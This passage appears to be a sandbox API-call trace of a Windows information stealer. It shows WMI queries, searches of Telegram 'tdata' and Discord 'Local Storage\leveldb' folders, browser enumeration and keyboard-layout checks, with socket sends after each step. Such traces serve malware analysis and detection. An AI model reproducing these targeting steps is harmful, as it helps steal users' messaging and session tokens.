This=0x5638c20, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638c20, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638c20, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5642710) returned 0x0 [0214.985] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642710, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.985] WbemDefPath:IUnknown:Release (This=0x5642710) returned 0x3 [0214.985] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.985] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638c20, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.985] WbemDefPath:IUnknown:Release (This=0x5638c20) returned 0x2 [0214.985] WbemDefPath:IUnknown:Release (This=0x5638c20) returned 0x1 [0214.985] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.985] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.986] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638c20, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638c20) returned 0x0 [0214.986] WbemDefPath:IUnknown:AddRef (This=0x5638c20) returned 0x3 [0214.986] WbemDefPath:IUnknown:Release (This=0x5638c20) returned 0x2 [0214.986] WbemDefPath:IWbemPath:SetText (This=0x5638c20, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3868\"") returned 0x0 [0214.986] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.986] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.986] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.986] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.986] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.986] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.986] IWbemClassObject:Get (in: This=0x5637460, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26a1734*=0, plFlavor=0x26a1738*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="AppLaunch.exe", varVal2=0x0), pType=0x26a1734*=8, plFlavor=0x26a1738*=0) returned 0x0 [0214.986] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0214.986] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0214.986] IWbemClassObject:Get (in: This=0x5637460, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26a1734*=8, plFlavor=0x26a1738*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="AppLaunch.exe", varVal2=0x0), pType=0x26a1734*=8, plFlavor=0x26a1738*=0) returned 0x0 [0214.986] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0214.986] SysStringByteLen (bstr="AppLaunch.exe") returned 0x1a [0214.986] CoTaskMemAlloc (cb=0x4) returned 0x5642740 [0214.986] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642740, puReturned=0x267acc0 | out: apObjects=0x5642740*=0x0, puReturned=0x267acc0*=0x0) returned 0x1 [0215.117] CoTaskMemFree (pv=0x5642740) [0215.117] CoGetContextToken (in: pToken=0x38eef8 | out: pToken=0x38eef8) returned 0x0 [0215.117] IUnknown:Release (This=0x544f098) returned 0x1 [0215.117] IUnknown:Release (This=0x544f098) returned 0x0 [0215.118] CoGetContextToken (in: pToken=0x38eef8 | out: pToken=0x38eef8) returned 0x0 [0215.119] IUnknown:Release (This=0x544efd0) returned 0x1 [0215.119] IUnknown:Release (This=0x544efd0) returned 0x0 [0215.120] CoTaskMemAlloc (cb=0x20c) returned 0x5628ee0 [0215.120] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5628ee0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0215.121] CoTaskMemFree (pv=0x5628ee0) [0215.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x38eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0215.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f050) returned 1 [0215.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x38eb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0215.121] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata\\*", lpFindFileData=0x38ee00 | out: lpFindFileData=0x38ee00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0215.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38edc0) returned 1 [0215.124] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x38ebc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0215.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f094) returned 1 [0215.124] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x38eb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0215.124] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata\\*", lpFindFileData=0x38ee44 | out: lpFindFileData=0x38ee44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0215.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee04) returned 1 [0215.129] CoCreateGuid (in: pguid=0x38edc4 | out: pguid=0x38edc4*(Data1=0x6135e47f, Data2=0x631, Data3=0x4ea0, Data4=([0]=0x91, [1]=0xbd, [2]=0x12, [3]=0xa7, [4]=0xce, [5]=0x9a, [6]=0xa4, [7]=0x27))) returned 0x0 [0215.129] CoCreateGuid (in: pguid=0x38ed08 | out: pguid=0x38ed08*(Data1=0x4bdcb87e, Data2=0x37c9, Data3=0x446c, Data4=([0]=0x95, [1]=0xa8, [2]=0x77, [3]=0xf, [4]=0xe0, [5]=0x98, [6]=0xa4, [7]=0xb3))) returned 0x0 [0215.129] send (s=0x268, buf=0x257341f*, len=167, flags=0) returned 167 [0215.130] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0215.246] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38eed4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0215.247] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\discord\\Local Storage\\leveldb", lpDst=0x38eed4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb") returned 0x41 [0215.247] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x38eb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0215.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38effc) returned 1 [0215.247] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x38eadc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0215.247] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*.log", lpFindFileData=0x38edac | out: lpFindFileData=0x38edac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0215.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed6c) returned 1 [0215.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x38eb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0215.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38effc) returned 1 [0215.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x38eadc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0215.250] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*.ldb", lpFindFileData=0x38edac | out: lpFindFileData=0x38edac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0215.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed6c) returned 1 [0215.320] CoCreateGuid (in: pguid=0x38edc8 | out: pguid=0x38edc8*(Data1=0x77718fa4, Data2=0xcddd, Data3=0x4161, Data4=([0]=0xaa, [1]=0x87, [2]=0xd3, [3]=0xe4, [4]=0xa5, [5]=0xf5, [6]=0x4f, [7]=0xaf))) returned 0x0 [0215.320] CoCreateGuid (in: pguid=0x38ed0c | out: pguid=0x38ed0c*(Data1=0x95cca3ce, Data2=0xdae2, Data3=0x47bb, Data4=([0]=0xaf, [1]=0x38, [2]=0xe5, [3]=0x30, [4]=0xfd, [5]=0x1c, [6]=0x16, [7]=0xda))) returned 0x0 [0215.400] send (s=0x268, buf=0x257341f*, len=213, flags=0) returned 213 [0215.401] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0215.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c8 | out: phkResult=0x38f0c8*=0x608) returned 0x0 [0215.442] RegQueryInfoKeyW (in: hKey=0x608, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x38f0f0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x38f0ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x38f0f0*=0x1, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x38f0ec*=0x1, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.442] RegEnumKeyExW (in: hKey=0x608, dwIndex=0x0, lpName=0x26aa540, lpcchName=0x38f10c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEXPLORE.EXE", lpcchName=0x38f10c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.443] RegOpenKeyExW (in: hKey=0x608, lpSubKey="IEXPLORE.EXE", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c8 | out: phkResult=0x38f0c8*=0x60c) returned 0x0 [0215.443] RegQueryValueExW (in: hKey=0x60c, lpValueName=0x0, lpReserved=0x0, lpType=0x38f0e8, lpData=0x0, lpcbData=0x38f0e4*=0x0 | out: lpType=0x38f0e8*=0x1, lpData=0x0, lpcbData=0x38f0e4*=0x24) returned 0x0 [0215.443] RegQueryValueExW (in: hKey=0x60c, lpValueName=0x0, lpReserved=0x0, lpType=0x38f0e8, lpData=0x26aa86c, lpcbData=0x38f0e4*=0x24 | out: lpType=0x38f0e8*=0x1, lpData="Internet Explorer", lpcbData=0x38f0e4*=0x24) returned 0x0 [0215.443] RegOpenKeyExW (in: hKey=0x60c, lpSubKey="shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c8 | out: phkResult=0x38f0c8*=0x610) returned 0x0 [0215.443] RegQueryValueExW (in: hKey=0x610, lpValueName=0x0, lpReserved=0x0, lpType=0x38f0e8, lpData=0x0, lpcbData=0x38f0e4*=0x0 | out: lpType=0x38f0e8*=0x1, lpData=0x0, lpcbData=0x38f0e4*=0x6c) returned 0x0 [0215.444] RegQueryValueExW (in: hKey=0x610, lpValueName=0x0, lpReserved=0x0, lpType=0x38f0e8, lpData=0x26aaa54, lpcbData=0x38f0e4*=0x6c | out: lpType=0x38f0e8*=0x1, lpData="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpcbData=0x38f0e4*=0x6c) returned 0x0 [0215.444] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpFilePart=0x0) returned 0x35 [0215.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38eddc) returned 1 [0215.444] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe"), fInfoLevelId=0x0, lpFileInformation=0x38f0a0 | out: lpFileInformation=0x38f0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e87a7f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2e87a7f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2eadbdf, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa4510)) returned 1 [0215.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38edd8) returned 1 [0215.446] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwHandle=0x38f114 | out: lpdwHandle=0x38f114) returned 0xc0c [0215.668] GetFileVersionInfoW (in: lptstrFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", dwHandle=0x0, dwLen=0xc0c, lpData=0x26aac20 | out: lpData=0x26aac20) returned 1 [0215.675] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x38f0e8, puLen=0x38f0e4 | out: lplpBuffer=0x38f0e8*=0x26ab220, puLen=0x38f0e4) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aacd8, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aad2c, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aad70, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aade0, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aae18, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aae9c, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aaee0, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x26aaf3c, puLen=0x38f064) returned 1 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x0, puLen=0x38f064) returned 0 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x0, puLen=0x38f064) returned 0 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x0, puLen=0x38f064) returned 0 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x38f068, puLen=0x38f064 | out: lplpBuffer=0x38f068*=0x0, puLen=0x38f064) returned 0 [0215.677] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x38f05c, puLen=0x38f058 | out: lplpBuffer=0x38f05c*=0x26ab220, puLen=0x38f058) returned 1 [0215.677] VerLanguageNameW (in: wLang=0x409, szLang=0x38edec, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0215.678] VerQueryValueW (in: pBlock=0x26aac20, lpSubBlock="\\", lplpBuffer=0x38f06c, puLen=0x38f068 | out: lplpBuffer=0x38f06c*=0x26aac48, puLen=0x38f068) returned 1 [0215.681] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0x5c475df4, Data2=0x2b88, Data3=0x4d73, Data4=([0]=0xa3, [1]=0x94, [2]=0x31, [3]=0x31, [4]=0xc6, [5]=0x10, [6]=0x5, [7]=0xf0))) returned 0x0 [0215.681] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x7fbade95, Data2=0xb97, Data3=0x48af, Data4=([0]=0x86, [1]=0x4c, [2]=0xd9, [3]=0x39, [4]=0x8a, [5]=0x2e, [6]=0x44, [7]=0x91))) returned 0x0 [0215.694] send (s=0x268, buf=0x257341f*, len=311, flags=0) returned 311 [0215.695] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0215.851] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0215.852] GetKeyboardLayoutList (in: nBuff=1, lpList=0x26af770 | out: lpList=0x26af770) returned 1 [0215.891] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0xb51f3e7a, Data2=0x5dbf, Data3=0x466d, Data4=([0]=0x90, [1]=0xa8, [2]=0x1d, [3]=0xe7, [4]=0x82, [5]=0x70, [6]=0x99, [7]=0x36))) returned 0x0 [0215.891] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x8c480ff9, Data2=0x79e3, Data3=0x4479, Data4=([0]=0x81, [1]=0x41, [2]=0x6c, [3]=0x70, [4]=0x5, [5]=0x7b, [6]=0x9f, [7]=0x74))) returned 0x0 [0215.891] send (s=0x268, buf=0x2608bff*, len=205, flags=0) returned 205 [0215.892] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 125 [0216.032] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f074 | out: puCount=0x38f074*=0x2) returned 0x0 [0216.032] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f070*=0x0, pszText=0x0 | out: puBuffLength=0x38f070*=0xf, pszText=0x0) returned 0x0 [0216.032] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f070*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f070*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0216.032] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38effc | out: ppv=0x38effc*=0x6d0cac) returned 0x0 [0216.032] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38eff4 | out: pAptType=0x38eff4*=1) returned 0x0 [0216.032] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38eff8 | out: ppvObject=0x38eff8*=0x0) returned 0x80004002 [0216.032] IUnknown:Release (This=0x6d0cac) returned 0x1 [0216.033] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec18 | out: ppv=0x38ec18*=0x55ee0f0) returned 0x0 [0216.033] WbemLocator:IUnknown:QueryInterface (in: This=0x55ee0f0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee30 | out: ppvObject=0x38ee30*=0x0) returned 0x80004002 [0216.033] WbemLocator:IClassFactory:CreateInstance (in: This=0x55ee0f0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee3c | out: ppvObject=0x38ee3c*=0x5642740) returned 0x0 [0216.034] WbemLocator:IUnknown:Release (This=0x55ee0f0) returned 0x0 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea5c | out: ppvObject=0x38ea5c*=0x5642740) returned 0x0 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea10 | out: ppvObject=0x38ea10*=0x0) returned 0x80004002 [0216.034] WbemLocator:IUnknown:AddRef (This=0x5642740) returned 0x3 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e36c | out: ppvObject=0x38e36c*=0x0) returned 0x80004002 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, 